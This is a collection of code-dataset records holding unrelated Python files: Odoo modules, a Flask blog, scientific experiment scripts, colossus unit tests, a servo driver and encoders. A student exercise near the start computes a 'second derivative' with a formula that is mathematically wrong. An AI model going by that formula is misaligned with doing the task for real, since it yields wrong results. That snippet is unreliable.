os.makedirs(LOG_DIR)\n\n with db.connection(GLYPHS_DB_CONNECT):\n yield Site(Server().app.resource(), logPath=LOG_PATH)\n\n\nRun.main()\n","sub_path":"runserver.py","file_name":"runserver.py","file_ext":"py","file_size_in_byte":1451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"523312183","text":"# Ejercicio1\n# A partir de los arrays x y fx calcule la segunda derivada de fx con respecto a x. \n# Esto lo debe hacer sin usar ciclos 'for' ni 'while'.\n# Guarde esta segunda derivada en funcion de x en una grafica llamada 'segunda.png'\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nx = np.linspace(0,2.,10)\nfx = np.array([0., 0.0494, 0.1975, 0.4444, 0.7901,1.2346 , 1.7778, 2.4198, 3.1605, 4.])\n\ndef segundaDer(a,b):\n segundaDerivada= ((a+1)+2*a*b-(b-1)**2)/(a**2)\n return segundaDerivada\n\nprint (segundaDer(x,fx))\n\n#plt.plot(x,segundaDer(x,fx))\n#plt.grid()\n#plt.savefig('segunda.png')\n\n\n\n\n","sub_path":"ejercicio1.py","file_name":"ejercicio1.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"491185218","text":"# -*- coding: utf-8 -*-\n##############################################################################\n#\n# OpenERP, Open Source Management Solution\n# Copyright (C) 2004-2010 Tiny SPRL ().\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. If not, see .\n#\n##############################################################################\n\nfrom openerp.fields import Float, Char, Many2one, One2many, Many2many, Integer, Boolean, Datetime, Selection, Text\nfrom openerp.models import Model, api, _, AbstractModel\nimport openerp\n\n\nclass ir_logging(Model):\n\n _inherit = 'ir.logging'\n\n levels_order = {'debug': 0,\n 'info': 1,\n 'warn': 2,\n 'error': 3,\n 'fatal': 4,\n }\n @api.one\n def _get_source_model(self):\n return None\n\n @api.multi\n def get_trimmed_message(self, message):\n\n if len(message) > 100:\n message = message[0:100] + '...'\n else:\n message = message[0:len(message)]\n \n return message\n\n level = Selection([('debug', 'Debug'),\n ('info', 'Information'),\n ('warn', 'Warning'),\n ('error', 'Error'),\n ('fatal', 'Fatal'), ], 'Level')\n model = Char('Model', size=64, required=True, select=1)\n model_name = Char('Model Name', size=64)\n model_id = Integer('Record ID', select=1, help=\"ID of the target record in the database\")\n source = Many2one('ir.model', compute='_get_source_model', string=\"Entity concern\")\n user = Many2one('res.users', 'User')\n\n \n\n @api.model\n def create(self, values):\n if not values.get('name'):\n values['name'] = self.get_trimmed_message(values.get('message'))\n\n if not values.get('line'):\n values['line'] = 1\n\n if not values.get('func'):\n values['func'] = 'func'\n\n if not values.get('path'):\n values['path'] = 'path'\n\n if not values.get('type'):\n values['type'] = 'server'\n\n db = openerp.sql_db.db_connect(self._cr.dbname)\n cursor = db.cursor(serialized=False)\n cursor.autocommit(True)\n self = self.with_env(self.env(cr=cursor))\n\n log_level = self.env.ref('log_extension.log_level')\n\n if self.levels_order.get((values.get('level', 'info'))) >= self.levels_order.get(log_level.value, 1):\n id = super(ir_logging, self).create(values)\n else:\n id = False\n cursor.commit()\n cursor.close()\n return id\n\n @api.multi\n def see_entity(self):\n\n return {'type': 'ir.actions.act_window',\n 'view_type': 'form',\n 'view_mode': 'form',\n 'res_model': self.model,\n 'context': {'init': True},\n 'res_id': self.model_id,\n }\n\nir_logging()\n\n\nclass mail_thread(AbstractModel):\n _name = 'mail.thread'\n _inherit = 'mail.thread'\n\n @api.model\n def log(self, model_id, message, level='debug', name='', model=None, user=None):\n data = {\n 'message': message,\n 'model_id': model_id,\n 'model': model or self._name,\n 'level': level,\n 'user': user or self._uid,\n 'name': name,\n }\n self.env['ir.logging'].create(data)\n","sub_path":"log_extension/log_extension.py","file_name":"log_extension.py","file_ext":"py","file_size_in_byte":4013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"430287113","text":"# -*- encoding utf-8 -*-\n\nfrom odoo import _, api, fields, models\nimport base64\nimport io\nimport os\nimport logging\nfrom jinja2 import Environment, FileSystemLoader\nfrom collections import defaultdict\nfrom odoo.exceptions import UserError, ValidationError\n\ntype_account = {\n 'savings': 'AHO',\n 'checking': 'CTE',\n}\n\ntype_ident = {\n 'cedula': 'C',\n 'ruc': 'R',\n 'pasaporte':'P',\n}\n\nclass accountBatchPayment(models.Model):\n _inherit = 'account.batch.payment'\n\n report_bank = fields.Binary(string='Archivo Bancario', readonly=True)\n report_bank_name = fields.Char(string='Nombre Archivo Bancario', store=True)\n payment_method_code = fields.Char(string='Metodo de Pago',compute=\"payment_method_id.code\")\n\n def report_bank_transfer(self):\n dtc = []\n data = {'employees':''}\n for payment in self.payment_ids:\n partner = payment.partner_id\n bank_ids = self.env['res.partner.bank'].search([('partner_id','=',partner.id)])\n if not bank_ids:\n raise ValidationError(_(\"%s no tiene registrada una cuenta bancaria.\" % (partner.name)))\n bank_id = bank_ids[0]\n if bank_id:\n dtc.append({\n 'identifier':partner.identifier,\n 'amount':'%.2f'%(payment.amount),\n 'type_account':type_account[bank_id.account_type],\n 'account_number':bank_id.acc_number,\n 'reference': payment.communication or 'PAGO',\n 'phone':partner.phone or partner.mobile,\n 'month':payment.payment_date.month,\n 'year':payment.payment_date.year,\n 'type_identifier':type_ident[partner.type_identifier],\n 'name':partner.name,\n 'code':bank_id.bank_id.bic,\n })\n if not dtc:\n raise ValidationError(_(\"Ninguno de los empleados tiene asignada una cuenta bancaria.\"))\n data = {'employees':dtc}\n if self.journal_id.format_transfer_id:\n tmpl_path = os.path.join(os.path.dirname(__file__), 'template')\n env = Environment(loader=FileSystemLoader(tmpl_path))\n format_report = env.get_template(self.journal_id.format_transfer_id+'.xml')\n report = format_report.render(data)\n buf = io.StringIO()\n buf.write(report)\n out = base64.encodestring(buf.getvalue().encode('utf-8')).decode()\n logging.error(out)\n buf.close()\n self.report_bank = out\n self.report_bank_name = 'Transferencia %s.txt' % (self.journal_id.name)\n return out\n else:\n raise ValidationError(_(\"Primero debe configurar un formato de Transferencia Bancaria en el Diario.\"))","sub_path":"l10n_ec_batch_payment/model/account_batch_payment.py","file_name":"account_batch_payment.py","file_ext":"py","file_size_in_byte":2808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"300937836","text":"import numpy as np\nimport os, re, sys\nfrom sklearn import metrics\n\nsys.path.insert(0, '/'.join(os.getcwd().split('/')[:-4]))\nimport myAUC\n\ndirnum = int(os.getcwd().split('/')[-1])-1\nprop = os.getcwd().split('/')[-2]\n\nload = 0\n\nseed0 = 1000001 + 100*dirnum\nnp.random.seed(seed0)\n\ndirpath = 'dir'\nos.system('mkdir -p %s' %dirpath)\nresfile = 'results.txt' \nfpres = open(resfile, 'w')\nfpres.write('M roc wrdlkh roc_macro roc_trans roc_macro_trans, fprAUC traintime\\n')\nfpres.close()\n\nCode = '../../../../../Code/SLDA/SSLDA'\nDatapath = '../../../../../Data/Ohsumed'\n\ntrfile = '%s/lda_train-data.dat' %Datapath\nif (prop != '1'):\n trlblfile = '%s/train-label%s.dat' %(Datapath,prop)\nelse:\n trlblfile = '%s/train-label.dat' %Datapath\ntfile = '%s/lda_test-data.dat' %Datapath\ntlblfile = '%s/test-label.dat' %Datapath\n#vfile = '%s/valid-data.dat' %Datapath\n#vlblfile = '%s/valid-label.dat' %Datapath\nvocabfile = '%s/vocabs.txt' %Datapath\n\ntrlbl = np.loadtxt(trlblfile)\ntlbl = np.loadtxt(tlblfile)\n(Dtr, C) = trlbl.shape\nDt = tlbl.shape[0]\nN = len(open(vocabfile).readlines())\nalpha = 0.1\nnu = 0.01\npsi = [2.0, 2.0]\nalpha_sigma = 0.3\nnu_sigma = 0.3\nM = 70\nT = 100\nBurnIn = 1500\nITER = 5\nconverged = 1e-3\n\n\n# training \nsettingfile = '%s/settings.txt' %dirpath\nfp = open(settingfile, 'w')\nfp.write('M %d\\nC %d\\nD %d\\nN %d\\nT %d\\nalpha %f\\nconverged %f' %(M,C,Dtr,N,T,alpha, converged))\nfp.close()\nseed = np.random.randint(seed0)\n\nif load == 0:\n\tcmdtxt = '%s %d train %s %s %s random %s' %(Code, seed, trfile, trlblfile, settingfile, dirpath)\nelse:\n\tcmdtxt = '%s %d train %s %s %s load %s %s/001' %(Code, seed, trfile, trlblfile, settingfile, dirpath, dirpath)\nprint(cmdtxt)\nos.system(cmdtxt)# + ' > /dev/null')\n\n# transductive learning:\nunlbld = np.where(trlbl[:,0]==-1)[0]\nif len(unlbld) > 0:\n\tb = np.loadtxt('%s/final.b' %dirpath)[unlbld,:]\n\tgtlbl_unlbld = np.loadtxt('%s/train-label.dat' %Datapath)[unlbld,:]\n\t(roc_trans, roc_macro_trans) = myAUC.compute_auc(b, gtlbl_unlbld)\nelse:\n\troc_trans = 0\n\troc_macro_trans = 0\n\ntrtime = np.loadtxt('%s/likelihood.dat' %dirpath)[-1,2]\n\n# test \nsettingfile = '%s/settings.txt' %dirpath\nfp = open(settingfile, 'w')\nfp.write('M %d\\nC %d\\nD %d\\nN %d\\nT %d\\nalpha %f\\nconverged %f' %(M,C,Dt,N,T,alpha, converged))\nfp.close()\nseed = np.random.randint(seed0)\n\ncmdtxt = '%s %d test %s %s %s/final %s' %(Code, seed, tfile, settingfile, dirpath, dirpath)\nos.system(cmdtxt)# + ' > /dev/null')\n\nwrdlkh = np.loadtxt('%s/test-lhood.dat' %dirpath)[1]\n\n# class prediction\ntlbl = np.loadtxt(tlblfile, dtype = np.int)\nypred = np.loadtxt('%s/testfinal.b' %dirpath)\n(roc, roc_macro) = myAUC.compute_auc(ypred, tlbl)\n\n# ThFprAUC for documents with no labels\nnolbld = np.where(np.sum(tlbl,1)==0)[0]\nif len(nolbld) > 0:\n\tTH = np.linspace(0,1,50)\n\tfpr = np.zeros(len(TH))\n\tfor t,th in enumerate(TH):\n\t\tpred = np.round(ypred[nolbld] > th)\n\t\ttn = np.sum((1-pred) == 1)\n\t\tfp = np.sum(pred == 1)\n\t\tfpr[t] = fp/float(fp+tn)\n\tfprAUC = metrics.auc(TH,fpr)\nelse:\n\tfprAUC = 0\n\nfpres = open(resfile, 'a')\nfpres.write('%d %f %f %f %f %f %f %f\\n' %(M, roc, wrdlkh, roc_macro, roc_trans, roc_macro_trans, fprAUC, trtime))\nfpres.close()\t\t\n\nos.system('rm -r dir')\n\n","sub_path":"Experiments/Ohsumed/SLDA/0.3/2/PyRun.py","file_name":"PyRun.py","file_ext":"py","file_size_in_byte":3170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"160837462","text":"\"\"\"\nImplements TaxBrain \"Macroeconomic Elasticities Simulation\" dynamic analysis.\n\"\"\"\n# CODING-STYLE CHECKS:\n# pycodestyle macro_elasticity.py\n# pylint --disable=locally-disabled macro_elasticity.py\n\nfrom taxcalc.policy import Policy\n\n\ndef proportional_change_in_gdp(year, calc1, calc2, elasticity):\n '''\n This function harnesses econometric estimates of the historic relationship\n between tax policy and the macro economy to predict the effect of tax\n reforms on economic growth.\n\n In particular, this model relies on estimates of how GDP responds to\n changes in the average after tax rate on wage income across all taxpayers\n (one minus the average marginal tax rate, or 1-AMTR). These estimates are\n derived from calculations of income-weighted marginal tax rates under the\n baseline and reform. The reform-induced change in GDP in year t is\n assumed to be equal to the assumed elasticity times the absolute (not\n proportional) change in one minus the average marginal tax rate in\n year t-1. In other words, the current-year change in GDP is assumed to\n be related to the prior-year change in the average marginal tax rate.\n\n Empirical evidence on this elasticity can be found in Robert Barro\n and Charles Redlick, \"Macroeconomic Effects from Government Purchases\n and Taxes\" (2011 Quarterly Journal of Economics). A pre-publication\n version of this paper is available at the following URL:\n .\n In particular, Barro and Redlick find that a 1 percentage point decrease\n in the AMTR leads to a 0.54 percent increase in GDP. Evaluated at the\n sample mean, this translates to an elasticity of GDP with respect to the\n average after-tax marginal rate of about 0.36.\n\n A more recent paper by Karel Mertens and Jose L. Montiel Olea,\n entitled \"Marginal Tax Rates and Income: New Time Series Evidence\",\n NBER working paper 19171 (June 2013 with September 2017 revisions)\n , contains additional empirical\n evidence suggesting the elasticity is no less than the 0.36 Barro-\n Redlick estimate and perhaps somewhat higher (see section 4.6).\n Their summary of the Barro and Redlick findings (on page 5) are\n as follows: \"Barro and Redlick (2011) however find that a one\n percentage point cut in the AMTR raises per capita GDP by around\n 0.5% in the following year. This estimate is statistically\n significant and amounts to a short run GDP elasticity to the\n net-of-tax rate of 0.36\".\n\n Parameters\n ----------\n year : calendar year of the reform-induced proportion change in GDP\n calc1 : Calculator object for the pre-reform baseline for prior year\n calc2 : Calculator object for the policy reform for prior year\n elasticity: Float estimate of elasticity of GDP wrt 1-AMTR\n\n Returns\n -------\n Float estimate of proportional change in GDP induced by the reform\n Note that proportional means a relative change but it is not expressed\n in percentage terms\n '''\n assert elasticity >= 0.0\n assert calc1.current_year == calc2.current_year\n assert calc1.data_year == calc2.data_year\n if year <= max(Policy.JSON_START_YEAR, calc1.data_year):\n return 0.0 # because Calculator cannot simulate taxes in year-1\n if calc1.current_year != (year - 1):\n msg = 'calc.current_year={} must be one less than year={}'\n raise ValueError(msg.format(calc1.current_year, year))\n _, _, mtr_combined1 = calc1.mtr()\n _, _, mtr_combined2 = calc2.mtr()\n avg_mtr1 = ((mtr_combined1 * calc1.array('c00100') *\n calc1.array('s006')).sum()) / calc1.weighted_total('c00100')\n avg_mtr2 = ((mtr_combined2 * calc2.array('c00100') *\n calc2.array('s006')).sum()) / calc2.weighted_total('c00100')\n proportional_chg_in_rate = ((1.0 - avg_mtr2) / (1.0 - avg_mtr1)) - 1.0\n return elasticity * proportional_chg_in_rate\n","sub_path":"taxcalc/macro_elasticity.py","file_name":"macro_elasticity.py","file_ext":"py","file_size_in_byte":3996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"250338963","text":"from numpy import array\nimport numpy as np\nfrom numpy import argmax\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.preprocessing import OneHotEncoder\nimport re\n\n\ndef encode_me(seq):\n # get sequence into an array\n seq_array = array(list(seq))\n\n # integer encode the sequence\n label_encoder = LabelEncoder()\n integer_encoded_seq = label_encoder.fit_transform(seq_array)\n\n # one hot the sequence\n onehot_encoder = OneHotEncoder(sparse=False)\n # reshape because that's what OneHotEncoder likes\n integer_encoded_seq = integer_encoded_seq.reshape(len(integer_encoded_seq), 1)\n onehot_encoded_seq = onehot_encoder.fit_transform(integer_encoded_seq)\n onehot_encoded_seq = array(onehot_encoded_seq)\n padded_array = np.zeros((41, 4))\n print(seq)\n padded_array[0:len(seq), :] = onehot_encoded_seq\n return padded_array\n\n\ndef one_hot_encode_(seq):\n mapping = dict(zip(\"ACUG\", range(4)))\n seq2 = [mapping[i] for i in seq]\n pre_padded = np.eye(4)[seq2]\n padded_array = np.zeros((41, 4))\n padded_array[0:len(seq), :] = pre_padded\n return padded_array\n\n\ndef one_hot_encode_75(seq):\n mapping = dict(zip(\"ACUG\", range(4)))\n seq2 = [mapping[i] for i in seq]\n pre_padded = np.eye(4)[seq2]\n padded_array = np.zeros((75, 4))\n padded_array[0:len(seq), :] = pre_padded\n return padded_array\n\n\ndef one_hot_encode_100(seq):\n mapping = dict(zip(\"ACUG\", range(4)))\n seq2 = [mapping[i] for i in seq]\n pre_padded = np.eye(4)[seq2]\n padded_array = np.zeros((100, 4))\n padded_array[0:len(seq), :] = pre_padded\n return padded_array\n\n\ndef one_hot_encode_120(seq):\n mapping = dict(zip(\"ACUG\", range(4)))\n seq2 = [mapping[i] for i in seq]\n pre_padded = np.eye(4)[seq2]\n padded_array = np.zeros((120, 4))\n padded_array[0:len(seq), :] = pre_padded\n return padded_array\n\n\ndef one_hot_encode_90(seq):\n mapping = dict(zip(\"ACUG\", range(4)))\n seq2 = [mapping[i] for i in seq]\n pre_padded = np.eye(4)[seq2]\n padded_array = np.zeros((90, 4))\n padded_array[0:len(seq), :] = pre_padded\n return padded_array","sub_path":"common/one_hot.py","file_name":"one_hot.py","file_ext":"py","file_size_in_byte":2106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"367066597","text":"from flask import Flask, render_template, request, redirect, url_for\r\nfrom flask_sqlalchemy import SQLAlchemy \r\nfrom datetime import datetime\r\n\r\napp = Flask(__name__) \r\n\r\n#connecting flask-sqlalchemy with sqlite\r\n\r\napp.config['SQLALCHEMY_DATABASE_URI'] = r'sqlite:///C:\\Users\\User\\Documents\\GitHub\\flask_blog\\Database\\blog.db' \r\n\r\n#linking the database with the apps python file\r\n\r\ndb = SQLAlchemy(app) \r\n\r\nclass Blogpost(db.Model):\r\n id = db.Column(db.Integer, primary_key=True)\r\n title = db.Column(db.String(50))\r\n subtitle = db.Column(db.String(50)) #creating the blog database model\r\n author = db.Column(db.String(20))\r\n date_posted = db.Column(db.DateTime)\r\n content = db.Column(db.Text)\r\n\r\n#routing the blog webpages\r\n\r\n@app.route('/')\r\ndef index():\r\n posts = Blogpost.query.all()\r\n return render_template('index.html',posts = posts)\r\n\r\n@app.route('/about')\r\ndef about():\r\n return render_template('about.html')\r\n\r\n@app.route('/post/')\r\ndef post(post_id):\r\n\r\n post = Blogpost.query.filter_by(id=post_id).one()\r\n return render_template('post.html', post=post)\r\n\r\n@app.route('/add')\r\ndef add():\r\n return render_template('add.html')\r\n\r\n@app.route('/contact')\r\ndef contact():\r\n return render_template('contact.html')\r\n\r\n@app.route('/addpost', methods=['POST'])\r\ndef addpost():\r\n title =request.form['title']\r\n subtitle =request.form['subtitle']\r\n author =request.form['author']\r\n content =request.form['content']\r\n\r\n post = Blogpost(title=title,subtitle=subtitle,author=author,content=content,date_posted=datetime.now())\r\n\r\n #adding the data to the database table \r\n db.session.add(post)\r\n db.session.commit()\r\n\r\n return redirect(url_for('index'))\r\n \r\n\r\nif __name__ == '__main__':\r\n app.run(debug = True)\r\n\r\n\r\n \r\n\r\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"199158752","text":"#!/usr/bin/python \r\n###########################################################################################\r\n# Filename: \r\n# LegacyCameraDriver.py\r\n###########################################################################################\r\n# Project Authors: \r\n# Juhapekka Piiroinen\r\n# Brian Wu\r\n# \r\n# Changes:\r\n# June 14, 2010 by Juhapekka Piiroinen - changes committed to svn\r\n# - added comments for the device commands according to the manual from Pololu\r\n# - added latest draft code for rotating base servo (Parallax Continuous Rotating Servo)\r\n# - note! you should be able to clear error flags with .get_errors function according to the manual\r\n# - renamed CameraDriver to LegacyCameraDriver as Brian Wu has done better one\r\n# - integrated batch of changes provided by Brian Wu\r\n#\r\n# June 11, 2010 by Brian Wu - Changes committed thru email\r\n# - Decoupling the implementation from the program\r\n#\r\n# April 19, 2010 by Juhapekka Piiroinen\r\n# - Initial Release\r\n# \r\n# Email:\r\n# juhapekka.piiroinen@gmail.com\r\n#\r\n# License: \r\n# GNU/GPLv3\r\n#\r\n# Description:\r\n# A python-wrapper for Pololu Micro Maestro 6-Channel USB Servo Controller\r\n#\r\n############################################################################################\r\n# /!\\ Notes /!\\\r\n# You will have to enable _USB Dual Port_ mode from the _Pololu Maestro Control Center_.\r\n#\r\n############################################################################################\r\n# Device Documentation is available @ http://www.pololu.com/docs/pdf/0J40/maestro.pdf\r\n############################################################################################\r\n# (C) 2010 Juhapekka Piiroinen\r\n# Brian Wu\r\n############################################################################################\r\nimport Device\r\n\r\nclass LegacyCameraDriver(object):\r\n def __init__(self,x_servo=0,y_servo=1,z_servo=2):\r\n self.x_servo = x_servo\r\n self.y_servo = y_servo\r\n self.z_servo = z_servo\r\n self.device = Device()\r\n self.device.set_acceleration(self.x_servo,10)\r\n self.device.set_speed(self.x_servo,10)\r\n self.device.set_acceleration(self.y_servo,10)\r\n self.device.set_speed(self.y_servo,10)\r\n self.device.set_acceleration(self.z_servo,10)\r\n self.device.set_speed(self.z_servo,10)\r\n self.device.go_home()\r\n\r\n def __del__(self):\r\n del(self.device)\r\n \r\n def status_report(self):\r\n return \"X: %s\\tY: %s\\tZ: %s\" % (self.device.get_position(self.x_servo),self.device.get_position(self.y_servo),self.device.get_position(self.z_servo))\r\n\r\n def pan(self,dx):\r\n x = self.device.get_position(self.x_servo)\r\n x += dx\r\n self.device.set_target(self.x_servo,x)\r\n self.device.wait_until_at_target()\r\n \r\n def tilt(self,dy):\r\n y = self.device.get_position(self.y_servo)\r\n y += dy\r\n self.device.set_target(self.y_servo,y)\r\n self.device.wait_until_at_target()\r\n\r\n def rotate(self,dz):\r\n z = self.device.get_position(self.z_servo)\r\n z += dz\r\n self.device.set_target(self.z_servo,z)\r\n self.device.wait_until_at_target()\r\n \r\n def goto(self,x,y,z=0):\r\n self.device.set_target(self.x_servo,x)\r\n self.device.set_target(self.y_servo,y)\r\n self.device.set_target(self.z_servo,z)\r\n self.device.wait_until_at_target()\r\n \r\n def reset(self):\r\n self.device.go_home()\r\n self.device.wait_until_at_target()\r\n","sub_path":"jpiimaestro/driver/LegacyCameraDriver.py","file_name":"LegacyCameraDriver.py","file_ext":"py","file_size_in_byte":3446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"439090686","text":"###################################################################################################\n#\n# test_lss_mass_function.py (c) Benedikt Diemer\n# \t\t\t\t \t benedikt.diemer@cfa.harvard.edu\n#\n###################################################################################################\n\nimport unittest\nimport numpy as np\n\nfrom colossus.tests import test_colossus\nfrom colossus.cosmology import cosmology\nfrom colossus.lss import mass_function\nfrom colossus.lss import peaks\n\n###################################################################################################\n# TEST CASES\n###################################################################################################\n\nclass TCMassFunction(test_colossus.ColosssusTestCase):\n\n\tdef setUp(self):\n\t\tcosmology.setCosmology('planck15', {'persistence': ''})\n\t\tpass\n\t\t\n\tdef test_hmfInput(self):\n\t\t\n\t\tM = 1E12\n\t\tz = 1.0\n\t\tnu = peaks.peakHeight(M, z)\n\t\tdelta_c = peaks.collapseOverdensity()\n\t\tsigma = delta_c / nu\n\t\t\n\t\tcorrect = 4.432081012627e-01\n\t\t\n\t\tmf = mass_function.massFunction(M, z, q_in = 'M', mdef = 'fof', model = 'press74')\n\t\tself.assertAlmostEqual(mf, correct, msg = 'Quantity M.')\t\t\t\n\n\t\tmf = mass_function.massFunction(sigma, z, q_in = 'sigma', mdef = 'fof', model = 'press74')\n\t\tself.assertAlmostEqual(mf, correct, msg = 'Quantity sigma.')\t\t\t\n\n\t\tmf = mass_function.massFunction(nu, z, q_in = 'nu', mdef = 'fof', model = 'press74')\n\t\tself.assertAlmostEqual(mf, correct, msg = 'Quantity nu.')\t\t\t\n\n\tdef test_hmfConvert(self):\n\t\t\n\t\tM = 1E13\n\t\tz = 0.2\n\t\t\n\t\tcorrect = 4.496509540103e-01\n\t\tmf = mass_function.massFunction(M, z, q_in = 'M', mdef = 'fof', model = 'press74', q_out = 'f')\n\t\tself.assertAlmostEqual(mf, correct, msg = 'Quantity f.')\t\t\t\n\n\t\tcorrect = 6.782011823365e-04\n\t\tmf = mass_function.massFunction(M, z, q_in = 'M', mdef = 'fof', model = 'press74', q_out = 'dndlnM')\n\t\tself.assertAlmostEqual(mf, correct, msg = 'Quantity dndlnM.')\t\t\t\n\n\t\tcorrect = 7.910798600386e-02\n\t\tmf = mass_function.massFunction(M, z, q_in = 'M', mdef = 'fof', model = 'press74', q_out = 'M2dndM')\n\t\tself.assertAlmostEqual(mf, correct, msg = 'Quantity M2dndM.')\t\t\t\n\t\t\t\t\n\tdef test_hmfModelsFOF(self):\n\t\tmodels = mass_function.models\n\t\tfor k in models.keys():\n\t\t\tmsg = 'Failure in model = %s.' % (k)\n\t\t\t\n\t\t\tif not 'fof' in models[k].mdefs:\n\t\t\t\tcontinue\n\t\t\t\n\t\t\tif k == 'press74':\n\t\t\t\tcorrect = [2.236817414379e-01, 1.792404500225e-02]\n\t\t\telif k == 'sheth99':\n\t\t\t\tcorrect = [2.037009972300e-01, 3.218302373538e-02]\n\t\t\telif k == 'jenkins01':\n\t\t\t\tcorrect = [6.026069725012e-02, 3.439425663994e-02]\n\t\t\telif k == 'reed03':\n\t\t\t\tcorrect = [2.037009972300e-01, 2.876252283306e-02]\n\t\t\telif k == 'warren06':\n\t\t\t\tcorrect = [2.176065144322e-01, 3.381465783767e-02]\n\t\t\telif k == 'reed07':\n\t\t\t\tcorrect = [1.912774404547e-01, 3.725141648998e-02]\n\t\t\telif k == 'crocce10':\n\t\t\t\tcorrect = [2.196760269744e-01, 4.196271782970e-02]\n\t\t\telif k == 'bhattacharya11':\n\t\t\t\tcorrect = [2.241120148148e-01, 4.066855813171e-02]\n\t\t\telif k == 'courtin11':\n\t\t\t\tcorrect = [1.519159471219e-01, 4.490343243803e-02]\n\t\t\telif k == 'angulo12':\n\t\t\t\tcorrect = [2.283404301823e-01, 3.771150749193e-02]\n\t\t\telif k == 'watson13':\n\t\t\t\tcorrect = [2.847700292451e-01, 3.805146849248e-02]\n\t\t\telse:\n\t\t\t\tmsg = 'Unknown model, %s.' % k\n\t\t\t\traise Exception(msg)\n\t\t\t\n\t\t\tself.assertAlmostEqualArray(mass_function.massFunction(np.array([1E8, 1E15]), 0.0, \n\t\t\t\t\t\t\t\tq_in = 'M', mdef = 'fof', model = k), correct, msg = msg)\n\n\tdef test_hmfModelsSO_200m(self):\n\t\tmodels = mass_function.models\n\t\tfor k in models.keys():\n\t\t\tmsg = 'Failure in model = %s.' % (k)\n\t\t\t\n\t\t\tmdef = '200m'\n\t\t\tz = 1.0\n\t\t\t\n\t\t\tif not (('*' in models[k].mdefs) or (mdef in models[k].mdefs)):\n\t\t\t\tcontinue\n\t\t\t\n\t\t\tif k == 'tinker08':\n\t\t\t\tcorrect = [2.510097130127e-01, 4.616673996075e-05]\n\t\t\telif k == 'watson13':\n\t\t\t\tcorrect = [1.621407762267e-01, 4.432897408699e-05]\n\t\t\telif k == 'bocquet16':\n\t\t\t\tcorrect = [2.836176934812e-01, 3.836934411575e-05]\n\t\t\telif k == 'despali16':\n\t\t\t\tcorrect = [2.566857998226e-01, 6.649213465912e-05]\n\t\t\telse:\n\t\t\t\tmsg = 'Unknown model, %s.' % k\n\t\t\t\traise Exception(msg)\n\t\t\t\n\t\t\tself.assertAlmostEqualArray(mass_function.massFunction(np.array([1E8, 1E15]), z, \n\t\t\t\t\t\t\t\tq_in = 'M', mdef = mdef, model = k), correct, msg = msg)\n\n\tdef test_hmfModelsSO_vir(self):\n\t\tmodels = mass_function.models\n\t\tfor k in models.keys():\n\t\t\tmsg = 'Failure in model = %s.' % (k)\n\t\t\t\n\t\t\tmdef = 'vir'\n\t\t\tz = 1.0\n\t\t\t\n\t\t\tif not (('*' in models[k].mdefs) or (mdef in models[k].mdefs)):\n\t\t\t\tcontinue\n\t\t\t\n\t\t\tif k == 'tinker08':\n\t\t\t\tcorrect = [2.509240630699e-01, 4.545587447828e-05]\n\t\t\telif k == 'watson13':\n\t\t\t\tcorrect = [1.613521597080e-01, 4.371829786360e-05]\n\t\t\telif k == 'despali16':\n\t\t\t\tcorrect = [2.566082087345e-01, 6.545617453508e-05]\n\t\t\telif k == 'comparat17':\n\t\t\t\tcorrect = [2.449535870384e-01, 2.345606191508e-05]\n\t\t\telse:\n\t\t\t\tmsg = 'Unknown model, %s.' % k\n\t\t\t\traise Exception(msg)\n\t\t\t\n\t\t\tself.assertAlmostEqualArray(mass_function.massFunction(np.array([1E8, 1E15]), z, \n\t\t\t\t\t\t\t\tq_in = 'M', mdef = mdef, model = k), correct, msg = msg)\n\n###################################################################################################\n# TRIGGER\n###################################################################################################\n\nif __name__ == '__main__':\n\tunittest.main()\n","sub_path":"simulations/Colossus/colossus/tests/test_lss_mass_function.py","file_name":"test_lss_mass_function.py","file_ext":"py","file_size_in_byte":5281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"399724145","text":"\"\"\"\nobf_logger.py:\n Define couple logging functions to use for the application to \n log debug/error/info/warning messages\n\"\"\"\n\nimport logging\nimport logging.handlers\nimport os\nimport obf_global_vars\n\n__author__ = obf_global_vars.AUTHORS\n__copyright__ = obf_global_vars.COPYRIGHT\n__credits__ = obf_global_vars.CREDITS\n__license__ = obf_global_vars.LICENSE\n__version__ = obf_global_vars.VERSION\n__maintainer__ = obf_global_vars.MAINTAINER\n__email__ = obf_global_vars.EMAIL\n__status__ = obf_global_vars.STATUS\n\n#\n# Set up logging to file if at least DEBUG level logging\n#\nFORMAT = '%(name)-12s: %(asctime)s %(levelname)-8s %(message)s'\nfh = logging.handlers.RotatingFileHandler(obf_global_vars.OBF_LOG_FILE, maxBytes=1024000, backupCount=3)\nfh.setLevel(logging.DEBUG)\nfh.setFormatter(logging.Formatter(FORMAT))\n\nlogger = logging.getLogger(\"Outbound faxes\")\nlogger.addHandler(fh)\n\n#\n# Writes INFO messages or higher to the sys.stderr\n#\nconsole = logging.StreamHandler()\nconsole.setLevel(logging.INFO)\n\n# Set a format which is simpler for console use\nformatter = logging.Formatter(FORMAT)\n\n# Tell the handler to use this 